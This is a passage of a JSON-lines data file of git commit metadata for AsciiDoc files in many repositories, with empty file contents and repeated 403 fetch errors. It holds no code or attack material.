2016-04-03-Letat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-Letat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-Letat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6f7e6024bc563a2d0b14ab049a8db12fea7c93c","subject":"Update 2017-02-17-Building-a-Linux-Devbox.adoc","message":"Update 2017-02-17-Building-a-Linux-Devbox.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-Building-a-Linux-Devbox.adoc","new_file":"_posts\/2017-02-17-Building-a-Linux-Devbox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"890867b8d8d236fcb2f494176ac2f8f58576fc99","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/09\/10\/deref.adoc","new_file":"content\/news\/2021\/09\/10\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"32132bf3f4a728f8568d712dbc814ad33d36c4cc","subject":"Add contributing.adoc document (#34)","message":"Add contributing.adoc document (#34)\n\nfeature: add contributing 
document\r\n","repos":"1and1\/cosmo,astrolox\/cosmo,1and1\/cosmo,astrolox\/cosmo,1and1\/cosmo,astrolox\/cosmo","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/astrolox\/cosmo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bcdef8fc591c7923b4c3574a6109af0f3e4c9a36","subject":"Fix example for spark.","message":"Fix example for spark.\n","repos":"elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a179897b9f02fc5019f0ecf793506ff99a491a3","subject":"PC-1152 thinkbig to kylo schema migration documentation","message":"PC-1152 thinkbig to kylo schema migration documentation\n","repos":"Teradata\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,Teradata\/kylo,peter-gergely-horvath\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,Teradata\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,Teradata\/kylo","old_file":"docs\/latest\/deployment\/schema-migration\/thinkbig-to-kylo-schema-migration.adoc","new_file":"docs\/latest\/deployment\/schema-migration\/thinkbig-to-kylo-schema-migration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/claudiu-stanciu\/kylo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bed669b20b3ed11f4a3e83ce9874557b028e0c36","subject":"Create xss.adoc","message":"Create xss.adoc\n\nDescription and example XSS payloads.","repos":"waratek\/spiracle,prateepb\/spiracle,prateepb\/spiracle,prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle","old_file":"xss.adoc","new_file":"xss.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c9b11339ff830713f2fbf909400f89bada133db","subject":"Update 2016-07-08-Configuring-Spinnaker-authentication-using-Git-Hub-O-Ath.adoc","message":"Update 2016-07-08-Configuring-Spinnaker-authentication-using-Git-Hub-O-Ath.adoc","repos":"gbougeard\/blog.english,gbougeard\/blog.english,gbougeard\/blog.english,gbougeard\/blog.english","old_file":"_posts\/2016-07-08-Configuring-Spinnaker-authentication-using-Git-Hub-O-Ath.adoc","new_file":"_posts\/2016-07-08-Configuring-Spinnaker-authentication-using-Git-Hub-O-Ath.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gbougeard\/blog.english.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a67689f8b82ba2ccafe9a64a9d736228d9eba660","subject":"Update 2016-07-22-Improving-performance-with-simple-compression.adoc","message":"Update 
2016-07-22-Improving-performance-with-simple-compression.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-07-22-Improving-performance-with-simple-compression.adoc","new_file":"_posts\/2016-07-22-Improving-performance-with-simple-compression.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83fc4ec2e5d143a33946788229b9ecde1b5047f8","subject":"zsh: Add a section that explains `envsecrets.zsh`","message":"zsh: Add a section that explains `envsecrets.zsh`\n\nKeeping the secrets in envsecrets.zsh is quite simple, however the\ncurrent setup of the configuration requires a little bit of manual help\nif one wants the most ease of use.\n\nThis section explains how to change `envsecrets.zsh`'s file permissions\nand how to avoid tracking it with git.\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfe8b8745e879a35b7705b879c6877d03422dd64","subject":"- Updated doc on mcast","message":"- Updated doc on mcast\n","repos":"pruivo\/JGroups,ibrahimshbat\/JGroups,belaban\/JGroups,pferraro\/JGroups,ibrahimshbat\/JGroups,pruivo\/JGroups,TarantulaTechnology\/JGroups,ibrahimshbat\/JGroups,ligzy\/JGroups,pferraro\/JGroups,dimbleby\/JGroups,kedzie\/JGroups,rpelisse\/JGroups,slaskawi\/JGroups,kedzie\/JGroups,pruivo\/JGroups,vjuranek\/JGroups,vjuranek\/JGroups,ligzy\/JGroups,rpelisse\/JGroups,Sanne\/JGroups,belaban\/JGroups,TarantulaTechnology\/JGroups,TarantulaTechnology\/JGroups,rhusar\/JGroups,danberindei\/JGroups,Sanne\/JGroups,kedzie\/JGroups,slaskawi\/JGroups,vjuranek\/JGroups,Sanne\/JGroups,dimbleby\/JGroups,ibrahimshbat\/JGroups,pferraro\/JGroups,deepnarsay\/JGroups,belaban\/JGroups,dimbleby\/JGroups,deepnarsay\/JGroups,deepnarsay\/JGroups,rhusar\/JGroups,rhusar\/JGroups,danberindei\/JGroups,slaskawi\/JGroups,ligzy\/JGroups,rpelisse\/JGroups,danberindei\/JGroups","old_file":"doc\/manual\/installation.adoc","new_file":"doc\/manual\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ibrahimshbat\/JGroups.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af090b5616b718dcd964a50b480d7ffe2227fa61","subject":"Update 2016-08-31-Title.adoc","message":"Update 2016-08-31-Title.adoc","repos":"crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io","old_file":"_posts\/2016-08-31-Title.adoc","new_file":"_posts\/2016-08-31-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crisgoncalves\/crisgoncalves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08b39d3a846a7b725c10ce8f7dfaaed5c4ce852e","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 
2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ab1789f389d2bf42df9c0d7ede28d029f5bf50e","subject":"Update 2017-07-21-Todos.adoc","message":"Update 2017-07-21-Todos.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-21-Todos.adoc","new_file":"_posts\/2017-07-21-Todos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"178843cd44f38c40e6832db97ddd00dc0c233ae0","subject":"y2b create post Does The Galaxy S8 Have A Serious Screen Problem?","message":"y2b create post Does The Galaxy S8 Have A Serious Screen Problem?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-22-Does-The-Galaxy-S8-Have-A-Serious-Screen-Problem.adoc","new_file":"_posts\/2017-04-22-Does-The-Galaxy-S8-Have-A-Serious-Screen-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f19a933225adb880631a989bf27cdb62ea460bc","subject":"Update 2013-02-22-Eclipse-Les-raccourcis-claviers-utiles.adoc","message":"Update 2013-02-22-Eclipse-Les-raccourcis-claviers-utiles.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-02-22-Eclipse-Les-raccourcis-claviers-utiles.adoc","new_file":"_posts\/2013-02-22-Eclipse-Les-raccourcis-claviers-utiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b5d70b2bf71e4e66b9872aaec5e6c21e89333d9","subject":"Update 2017-02-08-Automatic-turn-onoff-power-to-receiver.adoc","message":"Update 2017-02-08-Automatic-turn-onoff-power-to-receiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-02-08-Automatic-turn-onoff-power-to-receiver.adoc","new_file":"_posts\/2017-02-08-Automatic-turn-onoff-power-to-receiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"023da1baf62b97c0cc5eb73f6a13405840ea4f57","subject":"y2b create post The Ultimate Workstation PC Project","message":"y2b create post The Ultimate Workstation PC 
Project","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-07-The-Ultimate-Workstation-PC-Project.adoc","new_file":"_posts\/2013-05-07-The-Ultimate-Workstation-PC-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbb468b25af96b832d2d6c3401388e3a95bcef5f","subject":"y2b create post Unboxing Preview \\\/ Any gamers in the crowd?","message":"y2b create post Unboxing Preview \\\/ Any gamers in the crowd?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-07-Unboxing-Preview--Any-gamers-in-the-crowd.adoc","new_file":"_posts\/2011-12-07-Unboxing-Preview--Any-gamers-in-the-crowd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9afe25736acdac8e6256d43ce15985997edc71d2","subject":"Renamed '_posts\/2016-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc' to '_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc'","message":"Renamed '_posts\/2016-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc' to '_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc","new_file":"_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"370be02766f004c819b2e37fbb74c8734c184a71","subject":"Update 2016-12-08-Post-1.adoc","message":"Update 2016-12-08-Post-1.adoc","repos":"jlmcgehee21\/nooganeer,jlmcgehee21\/nooganeer,jlmcgehee21\/nooganeer,jlmcgehee21\/nooganeer","old_file":"_posts\/2016-12-08-Post-1.adoc","new_file":"_posts\/2016-12-08-Post-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlmcgehee21\/nooganeer.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d675277728ed077c38aa607bff3957b452045a54","subject":"Update 2016-6-29-PHP-CSV.adoc","message":"Update 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a77207f05d55e075724a1ca4532c21b08c17793b","subject":"Update 2018-08-06-Python.adoc","message":"Update 
2018-08-06-Python.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-06-Python.adoc","new_file":"_posts\/2018-08-06-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51218713a1084c9e6d50e2a93bd79f81a4a9aea0","subject":"[docs] Document how to recover from a majority failed tablet","message":"[docs] Document how to recover from a majority failed tablet\n\nThis adds some docs on how to recover when a tablet can no longer find\na majority due to the permanent failure of replicas.\n\nI tested this procedure by failing tablets in various ways:\n- deleting important bits like cmeta or tablet metadata\n- deleting entire data dirs\n- tombstoning 2\/3 replicas (and disabling tombstoned voting)\nand I was always able to recover using these instructions.\n\nChange-Id: Ic6326f65d029a1cd75e487b16ce5be4baea2f215\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8402\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"452fbb6bdf42c29549194f96f6419c38e6516121","subject":"High-level documentation","message":"High-level documentation","repos":"kovaloid\/infoarchive-sip-sdk,Enterprise-Content-Management\/infoarchive-sip-sdk","old_file":"configuration\/README.adoc","new_file":"configuration\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Enterprise-Content-Management\/infoarchive-sip-sdk.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"b10a69959bae67206e02f1947773d1ab907910d3","subject":"Update 2012-01-23-Couverture-des-tests-dintegration-avec-JaCo-Co-Maven-et-Sonar.adoc","message":"Update 2012-01-23-Couverture-des-tests-dintegration-avec-JaCo-Co-Maven-et-Sonar.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-01-23-Couverture-des-tests-dintegration-avec-JaCo-Co-Maven-et-Sonar.adoc","new_file":"_posts\/2012-01-23-Couverture-des-tests-dintegration-avec-JaCo-Co-Maven-et-Sonar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1f7c8db631829f46ee29b08e6f86e017eecbbda","subject":"Submitting updated version of the quick start guide","message":"Submitting updated version of the quick start guide\n\nMaking the quick start guide more descriptive","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"cb8c7b8e96afc3687d2f685eee6c37ea32323ac2","subject":"Update 2016-12-14-Testing-database-changes-using-Liquibase-in-continous-delivery.adoc","message":"Update 2016-12-14-Testing-database-changes-using-Liquibase-in-continous-delivery.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-12-14-Testing-database-changes-using-Liquibase-in-continous-delivery.adoc","new_file":"_posts\/2016-12-14-Testing-database-changes-using-Liquibase-in-continous-delivery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"216d8503fac3d9ca266073390ad0e309c12e11aa","subject":"Update 2015-11-05-improve-your-java-environment-with-docker.adoc","message":"Update 2015-11-05-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45362426bc44f675642455dedf80130885c2571f","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e7ee4f0752f2c2984ce677002010878b7c03f1f","subject":"Update 2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","message":"Update 
2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","new_file":"_posts\/2015-11-11-Making-an-internet-radio-with-a-Banana-Pi-and-cheaper-components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5ccf48fc48011d37fe9afc9f6e87e9ddbe11891","subject":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","message":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_file":"_posts\/2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05d07cf411005f5a2e147b490fd5fdd214ec391e","subject":"y2b create post MacBook Air Unboxing (13-inch MacBook Air 2013 Unboxing - Haswell)","message":"y2b create post MacBook Air Unboxing (13-inch MacBook Air 2013 Unboxing - Haswell)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-16-MacBook-Air-Unboxing-13inch-MacBook-Air-2013-Unboxing--Haswell.adoc","new_file":"_posts\/2013-06-16-MacBook-Air-Unboxing-13inch-MacBook-Air-2013-Unboxing--Haswell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3cb14cb6d0d818b73e8fab70eda7f17e4405ba0","subject":"Update 2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","message":"Update 2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2603e9b9d00ac10cf75337ab270a35fa638eac1","subject":"Update 2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","message":"Update 
2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","new_file":"_posts\/2015-07-23-Implementacion-de-un-CRUD-La-pantalla-de-Gestion-de-Trabajos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fb957a5d3b465ba08b0691d26e7bcc89776bada","subject":"Update 2020-05-14-Elastic-delete-document-by-timestamp.adoc","message":"Update 2020-05-14-Elastic-delete-document-by-timestamp.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2020-05-14-Elastic-delete-document-by-timestamp.adoc","new_file":"_posts\/2020-05-14-Elastic-delete-document-by-timestamp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a925b158b40bc644e470fa2ece388bc771c59da5","subject":"Update 2017-06-14-Red-Hat-Tech-Day-Demo-Recordings-June-2017.adoc","message":"Update 2017-06-14-Red-Hat-Tech-Day-Demo-Recordings-June-2017.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-06-14-Red-Hat-Tech-Day-Demo-Recordings-June-2017.adoc","new_file":"_posts\/2017-06-14-Red-Hat-Tech-Day-Demo-Recordings-June-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5b45a518ee62a30a9e3871011ab4b03e6850f63","subject":"Update 2010-11-29-0755-Afficher-les-videos-de-Parleys-dans-Confluence.adoc","message":"Update 2010-11-29-0755-Afficher-les-videos-de-Parleys-dans-Confluence.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-11-29-0755-Afficher-les-videos-de-Parleys-dans-Confluence.adoc","new_file":"_posts\/2010-11-29-0755-Afficher-les-videos-de-Parleys-dans-Confluence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"562e9df7c0157620e13b8771238be2d6bcfd88b7","subject":"Add readme","message":"Add readme\n","repos":"10sr\/server-provisions,10sr\/machine-setups,10sr\/machine-setups,10sr\/machine-setups,10sr\/server-provisions,10sr\/machine-setups","old_file":"conoha\/roles\/ddns\/README.adoc","new_file":"conoha\/roles\/ddns\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/10sr\/machine-setups.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"d4f11a5cb99da8d7c50d0c1bf719b0bf6d19951a","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 
